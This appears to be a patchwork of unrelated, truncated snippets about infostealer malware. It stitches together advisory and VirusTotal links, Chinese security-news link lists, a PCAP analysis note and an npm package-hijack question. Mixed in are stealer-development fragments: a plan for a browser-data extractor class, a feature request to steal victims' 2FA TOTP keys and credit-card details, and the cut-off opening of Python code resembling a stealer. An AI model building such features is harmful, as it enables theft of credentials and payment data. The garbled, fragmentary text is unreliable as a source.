-
https://www.verfassungsschutz.de/SharedDocs/publikationen/EN/prevention/2023-03-20-joint-cyber-security-advisory-korean.pdf;jsessionid=834BD21F680D21CD153DAEE8906AAF63.intranet261?__blob=publicationFi…
-
Several stealers such as W4sp stealer, and reols package
See also: https://www.virustotal.com/gui/file/f1fed89b8db4855ff9adbb517b21f136ccc359c4caba2852e57994773501128a from https://github.com/dit…
-
The goal is to make a base BrowserExtractor class that the browser classes (Chrome and Firefox) will extend from.
At a minimum, we should extract the browser history, after this, we can start looki…
-
# 每日安全资讯(2023-08-09)
- 喵喵喵喵
- [ ] [Download - HackTheBox](https://darkwing.moe/2023/08/08/Download-HackTheBox/)
- 先知安全技术社区
- [ ] [WP Ultimate CSV Importer远程代码执行分析-CVE-2023-4142](https://xz.aliyun…
-
I analyzed a PCAP file from a sandbox execution of the Evil Extractor stealer malware earlier today. This stealer collects credentials and files of interest from the victim’s computer and exfiltrate…
-
# 每日安全资讯(2023-07-12)
- HackerOne Hacker Activity
- [ ] [Rate limit missing sign-in page](https://hackerone.com/reports/1285441)
- [ ] [2M Reports on HackerOne Celebration! - Ability to bulk-submi…
-
# 每日安全资讯(2023-06-08)
- HackerOne Hacker Activity
- [ ] [Arbitrary write in the application's data folder and arbitrary read of server's replies from 3rd party apps.](https://hackerone.com/reports/1…
-
Hi!
See a warning at npm - https://www.npmjs.com/package/ua-parser-js - `This package has been hijacked. Please revert to 0.7.28`
First question - Can we use range `^0.7.28`, or it is not safe?
…
-
**Better Injection**
Add 2fa injection (eg, when someone enables 2fa it'll send the 2fa totp key)
Add CC injection (eg, when someone adds a new credit card to his account it'll get the credit card inf…
-
`from builtins import all,dir,exec,format,input,len,ord,print,int,list,range,set,str,open,exit
exec('')
import os
import threading
from sys import executable
from sqlite3 import connect as sql_co…